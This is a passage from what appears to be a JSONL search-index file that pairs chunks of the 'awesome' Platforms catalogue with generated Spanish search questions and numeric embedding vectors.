Dart.", "indexar": "que herramienta me sirve si quiero aprender a programar en una computadora pequeΓ±a de tamaΓ±o tarjeta de crΓ©dito", "v": [0.14111, 0.10675, -0.12806, -0.19215, 0.04003, -0.23352, 0.03548, 0.06354, -0.05093, -0.14767, -0.04463, -0.06044, -0.01989, -0.08811, 0.04726, 0.01234, 0.10185, -0.04863, 0.1062, 0.02068, 0.11146, -0.03927, -0.08608, -0.01517, -0.02877, 0.02037, 0.06652, 0.00376, -0.16736, 0.12564, 0.00945, 0.03989, 0.12258, -0.15199, -0.03366, -0.06947, -0.00833, -0.05291, -0.03775, 0.04149, 0.10121, 0.16706, 0.02101, 0.04724, 0.08893, 0.03017, 0.02802, 0.04896, -0.00638, 0.04568, -0.04726, -0.06139, -0.03338, -0.0538, 0.02788, -0.03627, 0.12549, -0.11406, 0.0384, -0.09901, -0.02893, 0.09273, -0.03967, 0.01389, -0.05024, 0.08773, 0.01394, -0.02519, -0.1162, 0.08494, -0.06581, 0.12085, 0.02217, -0.09185, 0.00274, 0.04105, -0.00869, -0.01752, 0.11306, -0.05506, -0.00676, -0.00672, -0.1071, -0.03688, -0.06553, -0.05462, 0.00108, -0.02267, 0.08506, -0.0741, -0.01826, 0.12955, -0.0691, -0.01519, 0.12486, 0.00332, 0.09433, 0.02776, -0.00764, 0.03503, 0.11606, -0.0971, -0.11425, 0.06831, -0.03186, 0.10644, 0.04342, -0.07441, -0.0461, -0.0489, 0.10748, 0.08059, -0.07984, -0.01913, -0.08158, -0.00263, 0.03149, -0.02199, -0.03588, -0.04122, -0.09596, 0.05625, -0.00133, 0.03921, -0.01356, 0.05101, -0.05722, 0.10974, -0.06301, -0.06178, 0.02435, -0.05626, -0.04949, -0.04595, -0.04096, 0.04666, -0.00111, -0.11795, -0.00647, -0.04366, 0.02639, 0.07263, -0.03821, -0.07663, 0.02617, 0.07476, 0.089, -0.01887, -0.09086, 0.0093, 0.00446, -0.00302, 0.00787, 0.05199, -0.04146, 0.026, 0.03219, 0.00574, -0.06539, 0.00576, -0.06019, 0.00455, 0.06317, 0.00349, -0.00274, -0.07065, -0.00987, 0.02437, 0.08074, 0.08682, -0.01501, 0.00659, 0.048, -0.01077, 0.02968, -0.07003, -0.03001, -0.01157, -0.06843, -0.06957, -0.06478, 0.05731, -0.02275, -0.02174, -0.07641, 0.01229, 0.01474, 0.0052, 0.01438, -0.03657, 0.01608, 0.04148, 0.00226, -0.01518, 0.041, -0.01015, -0.01696, 0.0149, 0.05147, -0.02022, -0.01587, 0.02532, -0.07879, -0.00771, 0.08395, 0.11641, -0.03922, 0.01734, -0.02667, 0.06891, 0.03905, -0.01394, 0.01922, -0.03844, -0.03502, -0.03954, -0.00387, 0.05822, 0.00611, 0.03147, 0.05622, -0.03335, 0.05266, 0.05434, -0.0222, -0.01216, 0.01795, 0.00063, 0.01504, -0.0187, -0.00386, -0.01444, -0.04013, -0.02708, 0.04256, 0.0065, 0.03072, -0.0305, -0.08212, 0.00183, -0.0351, 0.02825, -0.0325, -0.09969, -0.01314, -0.01494, -0.01279, -0.05367, -0.05628, -0.04486, -0.05571, -0.00446, 0.07002, -0.01007, -0.01618, 0.04467]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: watchOS β€” Operating system for the Apple Watch. JVM. Salesforce. Amazon Web Services. Windows β€” Consumer desktop operating system. PowerToys Run Plugins β€” Community plugins for the Windows quick launcher. IPFS β€” P2P hypermedia protocol. Fuse β€” Mobile development tools. Heroku β€” Cloud platform as a service. Raspberry Pi β€” Credit card-sized computer aimed at teaching kids programming, but capable of a lot more. Qt β€” Cross-platform GUI app framework. WebExtensions β€” Cross-browser extension system. Smart TV β€” Create apps for different TV platforms. GNOME β€” Simple and distraction-free desktop environment for Linux. KDE β€” A free software community dedicated to creating an open and user-friendly computing experience. .NET. Core. Roslyn β€” Open-source compilers and code analysis APIs for C# and VB.NET languages. DigitalOcean β€” Cloud computing platform designed for developers. Flutter β€” Google's mobile SDK for building native iOS and Android apps from a single codebase written in Dart.", "indexar": "cual es la mejor alternativa libre para montar mi propia interfaz grΓ‘fica en diferentes sistemas operativos", "v": [0.00648, 0.11771, -0.18908, -0.12242, -0.02443, -0.08558, 0.00452, -0.05544, -0.18378, -0.04195, 0.05463, -0.08108, -0.00154, -0.00145, 0.17693, -0.03406, 0.07244, -0.16012, 0.04739, -0.07069, -0.11718, 0.0202, -0.01123, -0.13717, -0.09176, -0.04484, 0.02828, -0.09729, -0.13071, -0.00731, 0.01938, 0.07356, 0.15626, -0.07274, -0.13297, -0.08271, 0.04327, -0.01184, 0.10929, -0.11318, 0.0378, -0.02134, -0.07158, 0.10274, 0.15347, -0.08869, -0.05518, 0.024, -0.07711, -0.04491, 0.00786, -0.07424, -0.04739, 0.02851, 0.04645, -0.16199, 0.15018, -0.11596, 0.03943, 0.01402, -0.02226, 0.09408, 0.0446, -0.03657, 0.10194, -0.00405, -0.10584, -0.05103, 0.01095, 0.03827, 0.02514, 0.05497, 0.00177, 0.02286, 0.00547, 0.11676, -0.02793, 5e-05, 0.12217, 0.00675, 0.07674, -0.03715, -0.04775, 0.15027, -0.02479, -0.09271, -0.00958, -0.09161, -0.02996, 0.04535, 0.05769, -0.02675, -0.01601, 0.03998, 0.04244, -0.09351, 0.00068, 0.12803, 0.04732, 0.01669, -0.03423, -0.04994, -0.14329, 0.01971, 0.0222, -0.09042, 0.00216, 0.02125, -0.00032, -0.00468, 0.01994, 0.00838, 0.00774, 0.053, -0.08327, -0.04163, 0.02511, -0.0028, -0.03317, -0.07183, -0.07377, 0.04696, 0.03691, -0.00087, 0.01368, -0.00643, 0.03713, 0.11006, -0.02226, 0.03568, -0.02196, -0.03825, -0.0532, -0.1454, -0.13541, -0.014, -0.01975, -0.06628, 0.04055, -0.01131, -0.00301, 0.04097, 0.06065, -0.07538, 0.00976, 0.07832, 0.07838, -0.12177, -0.02489, -0.0102, -0.00705, 0.03637, 0.02336, 0.036, -0.00066, 0.01212, 0.00702, -0.06882, -0.02673, 0.04126, 0.04173, -0.01018, -0.02237, 0.06203, -0.02468, -0.05787, -0.09429, 0.01519, 0.02613, 0.03608, -0.03031, 0.0788, 0.05098, -0.06032, 0.07856, -0.03951, -0.05495, -0.04898, 0.02411, -0.0237, -0.01924, 0.02566, -0.01704, -0.05873, -0.04373, -0.05923, 0.00568, 0.05546, 0.05046, -0.00036, -0.00403, 0.0517, -0.04574, 0.00336, 0.02515, -0.07234, 0.01822, -0.05291, -0.02607, -0.00114, -0.00032, -0.0026, 0.00834, -0.06961, 0.04205, 0.0506, 0.01127, 0.07424, 0.0486, 0.03056, 0.01683, 0.01801, 0.05963, -0.06362, -0.02788, -0.02055, 0.06071, -0.01023, 0.01613, -0.05169, 0.01845, 0.03438, 0.04228, 0.01391, -0.03304, 0.01497, 0.01034, 0.02655, -0.01835, -0.00516, -0.018, -0.00093, 0.00896, -0.01473, -0.01408, 0.01729, 0.03248, -0.02102, 0.01532, -0.09966, 0.08272, 0.09614, -0.03283, -0.05967, -0.03357, -0.05615, -0.09611, -0.00531, -0.00604, -0.06159, -0.04431, 0.03835, 0.05757, 0.00685, 0.01497, -0.0174]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Home Assistant β€” Open source home automation that puts local control and privacy first. IBM Cloud β€” Cloud platform for developers and companies. Firebase β€” App development platform built on Google Cloud. Adafruit IO β€” Visualize and store data from any device. Cloudflare β€” CDN, DNS, DDoS protection, and security for your site. Actions on Google β€” Developer platform for Google Assistant. ESP β€” Low-cost microcontrollers with WiFi and broad IoT applications. Deno β€” A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. DOS β€” Operating system for x86-based personal computers that was popular during the 1980s and early 1990s. Nix β€” Package manager for Linux and other Unix systems that makes package management reliable and reproducible. Integration β€” Linking together different IT systems (components) to functionally cooperate as a whole. Node-RED β€” A programming tool for wiring together hardware devices, APIs, and online services.", "indexar": "que programa es para controlar el hogar de forma local y privada?", "v": [-0.03936, 0.06106, -0.05842, -0.16711, -0.00084, -0.09842, 0.08658, 0.03563, -0.05465, -0.08658, -0.01474, -0.02642, 0.0594, -0.09573, -0.02422, -0.04747, 0.11661, -0.14547, 0.01348, 0.11792, -0.11288, 0.07191, -0.00163, 0.04472, -0.04449, -0.04011, 0.11351, -0.04073, -0.10117, 0.02653, 0.04792, 0.01101, 0.01505, -0.00512, -0.01134, 0.04789, 0.09218, -0.05102, 0.01968, 0.04421, 0.0254, -0.05259, 0.05794, 0.10174, 0.12486, 0.07753, 0.00251, -0.02451, -0.01009, -0.04614, -0.19037, -0.03434, 0.03574, 0.09915, 0.0519, -0.09893, -0.09146, -0.1487, 0.03282, -0.01593, -0.08018, -0.04235, 0.10748, 0.11413, -0.02376, -0.02544, 0.02353, 0.00596, -0.09877, -0.06812, 0.00169, -0.0369, -0.0061, 0.06543, -0.04469, -0.02253, -0.04945, -0.01983, 0.09996, -0.10236, -0.01371, -0.04215, -0.0328, 0.06144, -0.00892, -0.07265, -0.08639, -0.12367, -0.04131, -0.09119, 0.01524, -0.08287, 0.0673, 0.08839, -0.02869, -0.05541, 0.10645, 0.15397, -0.03548, 0.02907, 0.10089, -0.07138, -0.13494, 0.16692, 0.08142, 0.06932, 0.05488, 0.02759, -0.0455, 0.04603, -0.06588, 0.13142, -0.00318, 0.03167, 0.00151, 0.00477, -0.10598, -0.01506, 0.08397, -0.06476, -0.08885, -0.01708, 0.03261, -0.02005, 0.02415, -0.01723, 0.02734, 0.04929, -0.02787, 0.10662, 0.00581, 0.01439, 0.0339, -0.01739, -0.0234, -0.05711, -0.05932, -0.06013, -0.00844, -0.0332, -0.00897, 0.06581, 0.03857, -0.02547, 0.12326, -0.04058, -0.08272, -0.00376, -0.01209, 0.08837, -0.00477, 0.0729, -0.02709, -0.01263, -0.03319, 0.01068, -0.00949, -0.00423, 0.00286, 0.08631, -0.0578, 0.00244, -0.05466, -0.11326, 0.01167, -0.01484, 0.07215, 0.03426, 0.04408, 0.07943, -0.08139, 0.09593, -0.047, -0.05988, -0.02116, -0.06434, 0.08715, -0.11153, 0.0143, -0.04103, -0.05464, 0.13521, 0.01475, 0.03367, -0.04004, 0.02626, -0.04315, 0.09865, 0.00538, -0.01387, -0.09478, -0.03101, -0.00422, -0.00303, 0.00465, -0.02184, -0.02226, 0.03198, 0.02725, -0.02605, -0.04232, -0.02595, 0.0663, 0.02975, 0.03958, 0.08671, -0.00931, -0.04564, 0.03578, 0.06801, 0.02717, -0.01169, 0.04151, 0.04737, 0.00594, 0.0908, -0.04641, -0.03654, 0.04939, 0.0772, 0.077, -0.02048, 0.04667, -0.00632, 0.00399, -0.07617, 0.02326, 0.03836, 0.02207, 0.06016, -0.01898, -0.07199, 0.01814, 0.00199, 0.06345, -0.06194, 0.01628, -0.05576, -0.00234, -0.07299, -0.02036, 0.09265, -0.01708, -0.02041, -0.08569, -0.02348, -0.086, 0.02408, 0.03659, -0.00346, -0.01611, -0.00123, 0.05281, -0.04145, 0.02021, 0.07051]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Home Assistant β€” Open source home automation that puts local control and privacy first. IBM Cloud β€” Cloud platform for developers and companies. Firebase β€” App development platform built on Google Cloud. Adafruit IO β€” Visualize and store data from any device. Cloudflare β€” CDN, DNS, DDoS protection, and security for your site. Actions on Google β€” Developer platform for Google Assistant. ESP β€” Low-cost microcontrollers with WiFi and broad IoT applications. Deno β€” A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. DOS β€” Operating system for x86-based personal computers that was popular during the 1980s and early 1990s. Nix β€” Package manager for Linux and other Unix systems that makes package management reliable and reproducible. Integration β€” Linking together different IT systems (components) to functionally cooperate as a whole. Node-RED β€” A programming tool for wiring together hardware devices, APIs, and online services.", "indexar": "con que puedo visualizar datos de cualquier dispositivo conectado?", "v": [-0.04828, 0.23348, -0.19444, -0.18452, 0.05497, -0.00961, -0.06882, -0.03842, -0.06256, -0.04439, -0.01366, -0.14606, -0.11121, -0.02182, 0.03556, -0.0092, 0.11352, -0.1001, 0.01403, -0.11748, 0.00866, -0.06608, -0.05698, -0.0449, -0.02147, 0.00281, 0.01068, 0.03219, -0.13562, -0.06516, 0.03622, -0.05182, -0.0358, 0.04215, -0.09839, 0.03183, -0.006, 0.15277, -0.00399, -0.06752, -0.04112, -0.00092, -0.05958, 0.06211, 0.14225, 0.00831, -0.04113, -0.05243, -0.03214, 0.01969, -0.06419, 0.06105, -0.09541, 0.00558, -0.12256, -0.11458, 0.22925, -0.05008, 0.1432, -0.03975, -0.02577, 0.01073, -0.023, 0.02537, -0.03878, 0.02161, 0.08116, 0.12136, -0.04559, -0.01039, 0.00043, 0.03222, -0.05153, -0.00452, 0.11112, 0.08687, 0.01512, 0.00531, 0.07476, 0.11553, -0.01314, -0.02927, -0.01779, -0.04683, -0.03529, 0.09029, 0.04982, 0.03589, -0.00679, -0.07683, 0.16058, 0.07884, -0.02417, -0.00191, -0.00538, 0.04918, 0.0111, -0.04607, -0.01383, 0.05432, 0.08774, 0.11472, -0.05945, 0.08108, -0.00059, -0.02141, 0.01231, -0.00816, 0.02208, -0.0721, -0.08309, -0.06487, -0.04783, -0.01761, -0.03326, 0.01579, -0.03575, -0.0839, -0.02932, 0.03368, 0.03934, -0.06553, 0.09619, -0.05027, 0.07626, -0.00952, -0.05034, 0.07098, 0.04153, 0.04753, 0.05788, -0.00766, 0.02203, -0.00535, 0.03593, 0.0703, -0.07421, -0.03774, 0.04814, -0.04583, 0.0279, 0.03876, -0.01795, -0.01782, 0.06703, -0.08486, -0.00517, 0.04748, -0.06265, -0.00514, 0.01096, 0.04132, -0.03509, 0.07592, -0.03334, 0.08442, 0.02245, -0.06186, -0.03237, 0.03906, -0.05317, 0.03227, 0.02926, 0.04295, -0.06033, -0.06776, 0.01388, -0.02727, 0.09099, 0.02196, -0.11076, 0.09278, 0.05047, -0.04432, 0.01388, -0.00748, -0.05566, -0.03188, 0.00126, -0.07332, -0.05157, 0.02226, -0.04393, -0.09679, 0.00571, 0.01262, 0.01078, -0.03374, 0.03905, -0.01864, 0.05892, 0.12943, 0.05539, 0.0539, 0.0839, -0.10792, -0.08304, 0.01763, 0.06796, 0.00993, -0.0403, 0.01305, -0.03145, 0.00353, -0.00886, 0.05099, -0.03369, -0.03017, 0.01613, -0.01142, 0.0051, -0.03947, 0.096, -0.06018, -0.08693, -0.00576, 0.0635, -0.01271, -0.03165, -0.01005, 0.04204, 0.02754, 0.08774, -0.00528, -0.01186, 0.01512, 0.02873, 0.01124, -0.01472, -0.07923, -0.02577, 0.0064, -0.00286, 0.00212, 0.04816, 0.00281, -0.01401, -0.05523, -0.08065, -0.02331, 0.00848, 0.05274, 0.00508, -0.02118, -0.04671, -0.04759, -0.09754, 0.06301, -0.0363, -0.12128, -0.00589, 0.071, 0.06913, -0.02917, -0.00501, -0.00096]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Home Assistant β€” Open source home automation that puts local control and privacy first. IBM Cloud β€” Cloud platform for developers and companies. Firebase β€” App development platform built on Google Cloud. Adafruit IO β€” Visualize and store data from any device. Cloudflare β€” CDN, DNS, DDoS protection, and security for your site. Actions on Google β€” Developer platform for Google Assistant. ESP β€” Low-cost microcontrollers with WiFi and broad IoT applications. Deno β€” A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. DOS β€” Operating system for x86-based personal computers that was popular during the 1980s and early 1990s. Nix β€” Package manager for Linux and other Unix systems that makes package management reliable and reproducible. Integration β€” Linking together different IT systems (components) to functionally cooperate as a whole. Node-RED β€” A programming tool for wiring together hardware devices, APIs, and online services.", "indexar": "existe una alternativa libre a las plataformas en la nube para desarrolladores?", "v": [0.08741, -0.03249, -0.12137, -0.0791, -0.05509, 0.03663, -0.03887, -0.07269, -0.19591, -0.12154, -0.07777, -0.17835, -0.0845, 0.02356, -0.06806, -0.08009, -0.01896, -0.06238, 0.04962, -0.01374, -0.08735, 0.00994, -0.18759, -0.10081, -0.02821, -0.12144, 0.01707, 0.05588, -0.07106, -0.00425, -0.06427, -0.07414, 0.0162, -0.00938, -0.02116, -0.05738, 0.04131, -0.01757, -0.02766, -0.03076, 0.00897, -0.01727, -0.00102, 0.08166, -0.01694, -0.0181, -0.09283, -0.03228, 0.05018, 0.09812, -0.09559, 0.01004, -0.07526, 0.07539, 0.05722, -0.03585, 0.14014, -0.11823, -0.03224, -0.02798, -0.13274, 0.05506, 0.11897, -0.17591, 0.00719, 0.07374, -0.03041, 0.07654, -0.12915, 0.15227, 0.09475, 0.02921, 0.00034, 0.02208, -0.05345, 0.11868, -0.03521, -0.08976, -0.12253, 0.09861, 0.04476, 0.04249, -0.0073, 0.01679, -0.02735, -0.11763, 0.04621, -0.09813, -0.03078, 0.02693, -0.03653, 0.00906, 0.03521, 0.08298, 0.01343, -0.04848, 0.04701, 0.05088, -0.04379, 0.0118, -0.02643, 0.0933, 0.00608, -0.03276, -0.06908, 0.0339, 0.12099, -0.01957, -0.03714, -0.00771, 0.03931, 0.03521, 0.04214, 0.05815, -0.00915, -0.05459, 0.03919, -0.01025, -0.00754, 0.02922, -0.0031, -0.01029, -0.05353, -0.06747, 0.05227, 0.05103, -0.07307, 0.05236, -0.1058, -0.00061, -0.02952, -0.09599, -0.01581, 0.0281, -0.05968, 0.00697, 0.04917, -0.02345, 0.09449, 0.0332, 0.03645, -0.00382, -0.01212, -0.0279, 0.04726, -0.08874, -0.01669, -0.04333, 0.01433, -0.06183, -0.07086, 0.02341, -0.13994, 0.08557, -0.14514, 0.01375, -0.0007, 0.03391, -0.16577, 0.0836, 0.09385, 0.00164, -0.10495, -0.03255, 0.00596, -0.00363, 0.06238, 0.04678, -0.05877, 0.09151, 0.01179, 0.05011, 0.10619, -0.15531, 0.09588, 0.0162, 0.03096, -0.06171, -0.02011, -0.03759, 0.01965, -0.05703, -0.03647, 0.01454, -0.03958, -0.06146, -0.00345, -0.00595, -0.03179, 0.07809, -0.05925, -0.0074, -0.07521, -0.01021, 0.0452, -0.03542, -0.01049, -0.05516, -0.04404, 0.00673, -0.06922, 0.00601, 0.02002, -0.04366, -0.05247, 0.00337, 0.00093, 0.04937, 0.04408, -0.00455, 0.01047, 0.00641, -0.01529, 0.01202, 0.03847, -0.01159, 0.06405, -0.00076, 0.04169, -0.07495, -0.04347, -0.00187, -0.0119, 0.00133, -0.00164, 0.06961, -0.02114, 0.05497, -0.03061, -0.00702, 0.03351, -0.0361, 0.0193, -0.00208, -0.02601, -0.00287, 0.02447, 0.04344, -0.00394, 0.01981, -0.07525, 0.02611, 0.02165, 0.01204, -0.06643, -0.01839, -0.05545, -0.07978, -0.05475, -0.00703, -0.06265, 0.05374, 0.05235, -0.00581, -0.0134, 0.07358]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Low Code β€” Allowing business professionals to address their needs on their own with little to no coding skills. Capacitor β€” Cross-platform open source runtime for building Web Native apps. ArcGIS Developer β€” Mapping and location analysis platform for developers. Bluetooth Low Energy β€” Low-power wireless communication protocol ideal for IoT, wearables, and other battery-powered applications. Uno Platform β€” Open-source .NET UI platform for building cross-platform apps. Google Cloud β€” Cloud computing services by Google. Firebase Genkit β€” An open-source framework for building AI-powered apps and features. Backstage β€” Open-source platform for building Internal Developer Portals that unify tools and workflows.", "indexar": "ΒΏquΓ© herramienta sirve para crear aplicaciones web que funcionen en todos los dispositivos?", "v": [-0.06388, 0.11528, -0.11536, -0.23133, 0.10874, -0.17857, -0.11084, -0.02394, 0.0009, -0.04442, -0.08623, -0.09976, -0.08272, -0.08715, 0.04297, -0.0087, 0.04791, -0.18798, 0.03316, -0.0158, -0.0547, 0.04636, -0.12958, -0.01439, -0.13876, 0.02052, 0.11323, -0.04312, -0.22731, 0.02137, 0.03261, -0.01084, 0.10181, -0.05502, -0.1519, -0.08008, -0.02216, 0.02236, -0.03984, 0.09406, -0.00783, 0.0262, -0.07036, 0.04302, -0.01433, 0.07566, 0.0437, -0.04331, -0.06005, 0.1445, -0.03594, -0.08851, -0.07835, 0.06713, -0.04131, -0.13058, 0.15677, -0.17796, 0.06191, -0.06331, -0.16201, -0.02908, -0.05425, -0.03977, 0.03837, -0.06959, -0.00086, 0.05046, -0.05001, 0.05048, -0.00833, 0.02179, 0.03565, 0.04532, 0.0941, 0.10161, -0.05231, 0.01068, -0.01869, 0.01272, 0.05466, 0.00083, -0.08005, -0.07089, -0.01157, -0.02589, 0.07951, 0.04834, 0.02462, -0.11073, -0.00146, 0.07188, -0.00467, -0.01196, -0.00488, -0.03637, 0.08387, -0.04304, 0.07296, 0.03844, 0.09216, -0.09352, -0.09127, -0.02631, -0.09419, 0.0195, 0.03265, -0.03996, -0.05607, -0.02332, 0.03538, -0.08769, -0.01656, 0.01353, -0.02952, 0.08903, -0.00422, -0.10205, -0.00389, -0.03173, -0.01771, 0.02638, -0.02987, -0.03035, 0.05423, 0.04062, -0.01057, 0.06266, -0.02544, -0.00209, 0.04685, -0.11343, -0.07718, 0.06278, -0.0382, -0.0291, 0.03297, -0.06337, 0.00532, -0.01647, 0.08526, 0.05194, -0.07275, -0.05269, 0.02208, 0.01131, 0.07253, 0.01041, -7e-05, 0.01885, 0.03884, -0.06561, -0.06114, -3e-05, -0.07073, 0.00456, -0.06177, -0.02345, -0.07786, 0.04595, -0.07466, -0.00938, 0.0067, -0.00011, -0.0684, -0.0589, -0.00695, 0.02845, 0.1092, 0.05111, 0.00673, 0.06299, 0.08656, -0.06987, 0.04003, -0.02733, -0.01384, 0.02555, 0.03583, -0.07617, -0.04712, -0.02007, 0.02334, 0.00571, 0.04982, -0.04955, 0.01399, -0.01885, -0.03725, 0.05527, -0.03374, 0.04919, 0.00791, -0.02595, 0.06359, 0.00987, 0.00863, -0.08897, 0.01344, 0.00379, -0.02851, -0.03596, -0.0028, -0.02216, 0.02386, 0.07081, 0.01077, 0.01208, 0.00063, 0.03859, -0.00616, 0.02922, 0.02515, 0.04579, -0.00167, -0.06377, 0.02128, 0.05546, -0.02954, -0.04356, 0.03468, -0.03228, -0.03028, 0.00277, 0.01329, 0.07974, -0.00895, -0.01382, -0.02128, -0.06101, 0.05061, -0.09014, -0.00265, -0.0265, -0.00994, -0.04378, 0.02994, -0.01002, -0.06068, -0.00045, -0.06993, 0.03755, 0.04812, -0.00417, -0.05512, -0.02737, -0.00392, -0.03684, -0.06206, -0.0843, -0.04287, 0.03103, 0.07079, 0.0274, 0.03434, 0.02981]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Low Code β€” Allowing business professionals to address their needs on their own with little to no coding skills. Capacitor β€” Cross-platform open source runtime for building Web Native apps. ArcGIS Developer β€” Mapping and location analysis platform for developers. Bluetooth Low Energy β€” Low-power wireless communication protocol ideal for IoT, wearables, and other battery-powered applications. Uno Platform β€” Open-source .NET UI platform for building cross-platform apps. Google Cloud β€” Cloud computing services by Google. Firebase Genkit β€” An open-source framework for building AI-powered apps and features. Backstage β€” Open-source platform for building Internal Developer Portals that unify tools and workflows.", "indexar": "cual es una alternativa libre a los entornos de desarrollo tradicionales para profesionales no programadores?", "v": [0.20397, 0.04048, -0.05593, -0.07061, -0.01264, 0.04679, 0.13394, -0.0833, -0.15115, -0.0883, -0.0104, -0.0339, -0.05375, -0.11899, 0.01193, -0.04095, 0.05211, -0.11509, 0.08194, 0.04435, -0.08757, -0.04247, -0.11877, -0.04021, 0.04905, -0.14039, 0.024, -0.01975, -0.0547, 0.05213, 0.05242, 0.06616, 0.04852, -0.07024, 0.02358, -0.04893, 0.00587, 0.01886, -0.07813, -0.03971, 0.09622, -0.07905, -0.02444, 0.00866, 0.02625, -0.00772, -0.10185, -0.0461, -0.02358, -0.00337, -0.11903, 0.01863, 0.01926, -0.0574, 0.12676, -0.11152, 0.0841, -0.0767, -0.01891, -0.03929, -0.04079, 0.15593, 0.06842, -0.05913, 0.07791, -0.06787, 0.03907, 0.0034, -0.10851, 0.02445, 0.00423, 0.04403, -0.02496, -0.06203, -0.02358, 0.14549, -0.08785, 0.03021, -0.02747, 0.03971, 0.03555, -0.0591, 0.04663, 0.04112, -0.09348, -0.07685, 0.05645, -0.07972, -0.03991, -0.05648, 0.01566, 0.01138, -0.01831, 0.02621, 0.01841, -0.07397, 0.06109, 0.03307, 0.04794, 0.14495, 0.03453, -0.03141, -0.08921, 0.05078, 0.01851, 0.02658, 0.11499, -0.04349, -0.04706, -0.00615, -0.03737, 0.06664, 0.02023, 0.04548, -0.05395, -0.02319, -0.00888, -0.02553, 0.00424, 0.00066, -0.02697, -0.00589, -0.03161, 0.00327, -0.00296, 0.04952, -0.0374, 0.14108, -0.06209, 0.02892, 0.01206, -0.06107, -0.04176, -0.03338, -0.09181, 0.07392, 0.14065, -0.05525, 0.03969, 0.01792, -0.00364, 0.02185, -0.00547, -0.01642, 0.05459, -0.02274, 0.00012, -0.08364, -0.05868, -0.01823, -0.09556, 0.09208, -0.01109, 0.12567, -0.18566, 0.02626, -0.03847, 0.00842, -0.06226, 0.10395, 0.00788, 0.03541, 0.01161, -0.07282, -0.01489, 0.01966, 0.05388, -0.01733, 0.02351, 0.03792, -0.0147, 0.02667, 0.0076, -0.13092, 0.07423, -0.01956, -0.0656, -0.09571, 0.05595, -0.06409, -0.05235, 0.09504, -0.08895, 0.0032, -0.04299, -0.02708, 0.03255, -0.02703, 0.01176, 0.05106, -0.07026, 0.03747, -0.07537, -0.08313, -0.0447, -0.04139, -0.03758, -0.04909, -0.07852, -0.06869, -0.05533, -0.00308, 0.0079, -0.04872, -0.01122, 0.07436, -0.06927, 0.04113, -0.06137, 0.10495, 0.03979, -0.05923, 0.06867, 0.04475, -0.04806, -0.03992, 0.04752, -0.01504, 0.04688, -0.0141, 0.00629, -0.00588, 0.03966, -0.00861, -0.00325, -0.02691, 0.03116, 0.09598, 0.00981, 0.00236, 0.00532, 0.00317, -0.07716, -0.04141, 0.02431, 0.08494, -0.01222, -0.0474, -0.0666, -0.06125, 0.03525, 0.0711, -0.07894, -0.08037, -0.06399, -0.03858, -0.13761, -0.05685, 0.01605, -0.06208, -0.09592, 0.07075, 0.07144, -0.02208, 0.03157, 0.01045]} +{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Low Code β€” Allowing business professionals to address their needs on their own with little to no coding skills. Capacitor β€” Cross-platform open source runtime for building Web Native apps. ArcGIS Developer β€” Mapping and location analysis platform for developers. Bluetooth Low Energy β€” Low-power wireless communication protocol ideal for IoT, wearables, and other battery-powered applications. Uno Platform β€” Open-source .NET UI platform for building cross-platform apps. Google Cloud β€” Cloud computing services by Google. Firebase Genkit β€” An open-source framework for building AI-powered apps and features. Backstage β€” Open-source platform for building Internal Developer Portals that unify tools and workflows.", "indexar": "que plataforma me permite construir un portal interno para mi equipo de desarrolladores?", "v": [0.03872, 0.05122, -0.17801, -0.22132, 0.01482, -0.03765, 0.04942, -0.03052, -0.14017, -0.1562, -0.08251, 0.00191, 0.03178, -0.05911, -0.00911, 0.04274, 0.08691, -0.04149, -0.0169, -0.03769, -0.05473, -0.00617, -0.03439, -0.12081, 0.04074, -0.12273, 0.03333, -0.01082, -0.11654, -0.05366, 0.00474, 0.01795, -0.00842, 0.00362, 0.06201, -0.21759, -0.00016, 0.08581, -0.02238, -0.01085, -0.04973, 0.01907, -0.0818, -0.01727, 0.08445, 0.04111, 0.07537, -0.1246, 0.01538, 0.04654, -0.11597, -0.0064, -0.09425, 0.01313, 0.01612, -0.0908, 0.18475, -0.17112, 0.10343, -0.04688, -0.10658, -0.03184, 0.04451, -0.04728, -0.04009, 0.02007, -0.09117, 0.05754, -0.09827, 0.074, 0.01234, 0.00764, -0.02597, -0.06812, -0.02266, 0.07483, -0.00414, -0.03803, -0.03736, -0.01994, 0.08547, -0.00354, -0.11118, 0.00373, 0.05321, -0.06109, -0.03465, 0.06115, -0.00296, -0.03006, 0.00745, -0.08818, -0.09347, -0.02133, -0.08199, -0.12262, 0.12109, 0.01464, -0.04619, -0.04195, -0.13442, -0.0163, 0.06652, 0.03511, -0.04818, 0.04614, 0.05707, -0.04646, -0.00373, -0.10757, 0.13471, 0.0043, -0.02919, 0.0123, -0.02008, 0.04764, -0.05402, 0.03251, -0.02493, -0.01678, 0.00867, 0.01631, -0.04373, -0.07507, 0.0166, -0.03806, -0.07007, -0.0149, 0.00906, 0.02307, -0.03508, 